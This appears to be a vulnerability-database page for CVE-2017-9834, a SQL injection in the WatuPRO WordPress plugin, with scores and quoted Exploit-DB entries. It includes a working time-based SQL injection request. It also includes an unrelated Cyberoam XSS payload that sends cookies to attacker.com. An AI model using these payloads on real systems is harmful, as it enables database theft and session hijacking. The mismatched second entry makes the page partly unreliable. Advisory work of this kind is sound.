CVE-2017-9834
published 2017-09-07CVE-2017-9834: SQL injection vulnerability in the WatuPRO plugin before 5.5.3.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the…
PriorityP264critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
4.07%
89.4th percentile
SQL injection vulnerability in the WatuPRO plugin before 5.5.3.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the watupro_questions parameter in a watupro_submit action to wp-admin/admin-ajax.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| calendarscripts | watupro | <= 5.5.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1↗
- ·The vulnerability affects WatuPRO plugin versions prior to 5.5.3.7; the vendor's first patch was incomplete and did not properly fix the issue. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin WatuPRO 5.5.1 - SQL Injection
exploitdb·2017-07-03·CVSS 9.8
CVE-2017-9834 [CRITICAL] WordPress Plugin WatuPRO 5.5.1 - SQL Injection
WordPress Plugin WatuPRO 5.5.1 - SQL Injection
---
#####################################
Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
Exploit Author: Manich Koomsusi
Date: 03-07-2017
Software: WatuPRO
Version: 5.5.1
Website: http://calendarscripts.info/watupro/
Tested on: WordPress 4.7.5
Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
CVE: CVE-2017-9834
#####################################
Description
SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.
Vulnerability
This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.
Proof of concept
Take exams or quizzes and submit to the server in P
Exploit-DB
Sophos Cyberoam - Cross-site scripting
exploitdb·2017-05-25·CVSS 6.1
CVE-2016-9834 [MEDIUM] Sophos Cyberoam - Cross-site scripting
Sophos Cyberoam - Cross-site scripting
---
# Exploit Title: Sophos Cyberoam – Cross-site scripting (XSS) vulnerability
# Date: 25/05/2017
# Exploit Author: Bhadresh Patel
# Version:
window.location="
http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\
";document.location='
http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA
"
-------------------------- Source code (capture.php)
window.location=\"
http://192.168.30.30/corporate/webpages/index.jsp\""
?>
Credits:
Bhadresh Patel
No writeups or analysis indexed.
2017-09-07
Published